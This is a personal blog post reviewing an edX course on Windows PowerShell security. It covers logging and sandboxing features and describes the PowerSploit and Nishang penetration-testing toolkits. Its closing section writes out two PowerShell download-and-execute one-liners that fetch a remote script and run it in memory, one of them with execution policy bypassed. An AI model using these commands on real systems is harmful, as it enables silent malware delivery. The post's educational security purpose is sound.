А АThursday 15 March 2018

Implementing Windows PowerShell Security.

Hi there.

Recently I have well done online great course about PowerShell Security. This course is on EDX web-portal and his name is "INF251x: Implementing Windows PowerShell Security".

To my mind it was one of the best free courses about PowerShell. I got many new features about scripting technology. 

The Windows PowerShell team has put significant effort into securing and hardening its product. This effort included a comparative analysis of security across most popular shells and scripting languages. The analysis was based on the following criteria:
  • Event Logging – The engine logs audit events of important operational events.
  • Transcription – The engine logs application inputs and outputs.
  • Dynamic Evaluation Logging – The engine logs the content of all content evaluation, including those generated or composed at runtime.
  • Application Whitelisting – The engine allows enforcement of code integrity / application whitelisting policies, including user-authored documents / scripts.
  • Antimalware Integration – The engine actively integrates with antimalware software to evaluate the safety of code generated at runtime.
  • Local Sandboxing – The engine allows sandboxing of behavior for local and interactive use.
  • Remote Sandboxing – The engine allows sandboxing of behavior when accessed remotely.
  • Untrusted Input Tracking – The engine allows script developers to track and make security decisions based on whether a variable or input was influenced by user input.


Also I would like to pay your attention to one moment - authors of course give us some examples about PowerShell penetration cases. It's wonderful. 

For example, PowerSploit is a collection of Windows PowerShell modules, developed by Matt Graeber and available on GitHub at https://github.com/PowerShellMafia/PowerSploit that is used to aid penetration testing, forensics, and reverse engineering of Windows PowerShell exploits. Some of its most notable features include support for:

  • CodeExecution – facilitating execution of arbitrary code on a target computer, including DLL injection, reflective loading of Windows portable executables (PEs), and executing Windows PowerShell script blocks
  • ScriptModification – assisting with obfuscating scripts prior to their execution on a target computer, including compression, Base64 encoding and encryption.
  • Persistence – adding persistence capabilities to Windows PowerShell scripts.
  • Exfiltration – extracting authentication and data secrets, including capturing logon tokens, password hashes (with Mimikatz 2.0 loaded directly into memory), and Windows vault credentials, as well as performing keystroke logging
  • Reconnaissance – performing penetration tests, including port scanning and Windows domain enumeration.


Or another one Nishang, developed by Nikhil Mittal and available on GitHub at https://github.com/samratashok/nishang is also a collection of scripts and payloads intended for Red Teaming activities. Some of the most notable features include support for:

  • Code execution - executing Windows PowerShell scripts in memory, with support for file uploads and downloads, retrieving scripts from DNS TXT queries or WLAN SSIDs, and modifying default permissions of DCOM, WMI, and PowerShell remoting
  • Infection – creating infected Word, Excel, HTA, CHM, Java, and shortcut files.
  • Privilege Escalation – bypassing User Access Control (UAC), switching to the SYSTEM security context, and removing updates in order to re-introduce legacy vulnerabilities.
  • Exfiltration – collecting the local SAM file, LSA secrets, password hashes, WLAN keys, keystrokes and password hints.
  • Reconnaissance and lateral movement – performing port scanning, brute force attacks against Active Directory, SQL Server, SharePoint Server and FTP services, locating domain member computers with Kerberos unconstrained delegation setting enabled.
  • Persistence – adding reboot persistence capability to Windows PowerShell scripts.
  • Obfuscation – encoding and compressing scripts.


In conclusion I had to execute interesting lab. In online lab you manage an Active Directory environment with domain-joined Windows Server 2016 servers and Windows 10 Professional client computers. You plan to take advantage of the Windows PowerShell 5.1 functionality to enhance security of your environment.


After completing this lab, students will be able to:
• Implement Windows PowerShell logging by using Desired State Configuration (DSC)
• Identifying and mitigating Windows PowerShell-based exploits
• Implementing Just Enough Administration (JEA).

And one sweet cake as last point. Do you know that I can download remote payload accessible via HTTP/HTTPS directly into memory and execute script on the fly? No, so you can see this command line below:

powershell.exe -NoProfile -Command "iex((New-Object Net.WebClient).DownloadString('http://mysite.com/install-hack.ps1'))"
-OR-
powershell.exe –ep Bypass –nop –noexit –c iex (New-Object System.Net.WebClient).DownloadString(“https://bit.ly/M1w@r3”)

Good luck with PowerShell.

No comments:

Post a Comment

А что вы думаете по этому поводу?

Версия на печать

Популярное